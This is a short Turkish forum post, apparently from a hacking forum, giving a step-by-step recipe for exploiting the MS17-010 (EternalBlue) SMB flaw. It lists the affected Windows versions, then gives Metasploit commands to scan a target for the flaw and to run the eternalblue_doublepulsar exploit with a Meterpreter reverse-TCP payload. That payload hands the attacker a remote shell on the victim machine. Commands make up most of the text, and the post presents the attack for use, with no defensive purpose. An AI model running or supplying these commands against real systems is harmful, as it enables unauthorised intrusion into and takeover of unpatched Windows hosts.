MS17-010 Zafiyeti - CVE-2017-0143

Etkilenen sistemler Windows Server 2003 SP0 (x86) Windows XP (all services pack) (x86) (x64) Windows Server 2003 SP1/SP2 (x86) Windows Server 2003 (x64) Windows Vista (x86)...

Etkilenen sistemler
Kod:
Windows Server 2003 SP0 (x86)
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows 7 (all services pack) (x86) (x64)
Windows Server 2008 R2 (x86) (x64)

Hedef sistemde bu açığın olup olmadığını anlamak için Metasploit le bi kaç deneme yapıcaz. Kullanımı çok basitir.

Kod:
msfconsole
msf> use auxiliary/scanner/smb/smb_ms17_010
msf>set rhosts <rip>

[!] <ip>:445 – Host is likely VULNERABLE to MS17-010! --> Böle Yazı Çıkarsa Hedef Sistemde Bu Zaafiyet Var Demektir Hemen Exploiting İşlemine Geçelim:)

Exploiting İşlemi >>

Exploit için ilk önce Metasploitin veritabanı olarak kullandığı postgresql servisi başlatılmalıdır.

Kod:
service postgresql start

Exploitin Kullanımı >>

Kod:
msfconsole
msf>use exploit/windows/smb/eternalblue_doublepulsar
msf>show options
msf>set rhost <ip>
msf>set target <target>
msf>set targetarchitecture x64
msf>set payload windows/x64/meterpreter/reverse_tcp
msf>set lhost <lip>
msf>run

Exploit Bitmişdir Artık Meterpreter Ekranı Karşınızda Kolay gelsin:)
 
131,866Konular
3,272,122Mesajlar
316,423Kullanıcılar
kayrajsskkskSon Üye
Üst Alt